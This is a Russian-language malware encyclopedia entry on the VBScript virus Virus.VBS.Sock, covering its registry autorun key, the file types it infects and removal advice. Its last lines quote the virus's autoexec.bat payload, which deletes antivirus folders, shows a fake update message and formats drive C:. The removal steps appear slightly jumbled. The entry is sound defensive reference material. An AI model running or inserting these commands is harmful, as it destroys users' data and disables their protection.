Virus.VBS.Sock
Материал из Total Malware Info
Virus.VBS.Sock Вирус, заражающий файлы. Имеет размер 2 086 байт. Написан на Visual Basic Script.
Инсталляция
При запуске вирус копирует свое тело в системный каталог Windows:
%System%\Wsock32.vbs
Для автоматического запуска при следующем старте системы вирус добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:
[HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices] "Wsock32" = "%System%\Wsock32.vbs"
Деструктивная активность
Вирус на всех логических и сетевых дисках рекурсивно заражает своим телом файлы с расширениями:
*.js *.vbs *.html *.ini *.doc
Далее вирус изменяет файл командного интерпретатора "C:\autoexec.bat", таким образом, если на зараженной системе стоит Windows 9x, то после перезагрузки системы:
- Удаляются файлы:
C:\Progra~1\Networ~1\McAfee~1 C:\Progra~1\Norton~1
Рекомендации по удалению
Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:
- Удалить оригинальный файл вируса (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
- Удалить параметр в ключе реестра (как работать с реестром?):
- Перезагрузить компьютер в «безопасном режиме» (в самом начале загрузки нажать и удерживать клавишу «F8», затем выбрать пункт «Safe Mode» в меню загрузки Windows). В файле командного интерпретатора "C:\autoexec.bat" удалить строки:
[HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices] "Wsock32" = "%System%\Wsock32.vbs"
@echo off prompt $p$g Set Path=C:\Windows;C:\Windows\Command @DELTREE C:\Progra~1\Networ~1\McAfee~1 @DELTREE C:\Progra~1\Norton~1 CLS echo Please wait...Windows is updating your registry settings... echo This may take several minutes... @FORMAT C: /SELECT /U
